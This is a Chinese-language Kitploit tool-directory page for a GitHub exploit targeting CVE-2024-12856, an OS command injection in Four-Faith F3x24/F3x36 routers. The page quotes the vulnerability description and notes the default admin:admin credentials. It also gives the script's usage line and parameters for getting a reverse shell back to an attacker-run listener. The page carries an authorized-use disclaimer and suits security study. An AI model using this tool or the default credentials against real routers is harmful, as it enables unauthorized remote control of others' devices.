Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-12856 — 四信(Four-Faith)路由器的一个漏洞利用工具,用于获取反向 Shell。 | Kitploit
工具/GitHubGitHub/nu113d/cve-2024-12856
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubnu113d/cve-2024-12856

CVE-2024-12856

四信(Four-Faith)路由器的一个漏洞利用工具,用于获取反向 Shell。

查看仓库
31年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-12856

这是一个针对四信(Four-Faith)路由器型号 F3x24 和 F3x36 的漏洞利用程序,用于获取反向 Shell。

“四信路由器型号 F3x24 和 F3x36 受到操作系统(OS)命令注入漏洞的影响。至少固件版本 2.0 允许经过身份验证的远程攻击者通过 apply.cgi 修改系统时间时,通过 HTTP 执行任意操作系统命令。此外,该固件版本存在默认凭据,如果未更改,实际上会将此漏洞转变为未经身份验证的远程操作系统命令执行问题。”

来源:nist.gov

此脚本基于 VulnCheck 观察到的载荷。

使用方法

在运行漏洞利用程序之前,请先在您的机器上启动一个 TCP 服务器。
然后运行

python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT

其中

  • RHOST 是远程 IP 地址。您也可以添加域名。
  • LHOST 是您机器上 TCP 服务器的 IP。
  • LPORT 是您 TCP 服务器的端口。
  • USERNAME 和 PASSWORD 是路由器的凭据。默认为 admin:admin。
  • RPORT 是路由器的远程端口。默认为 80。

免责声明

请确保仅在测试和授权环境中使用此漏洞利用程序。

切勿将其用于恶意目的。

下载工具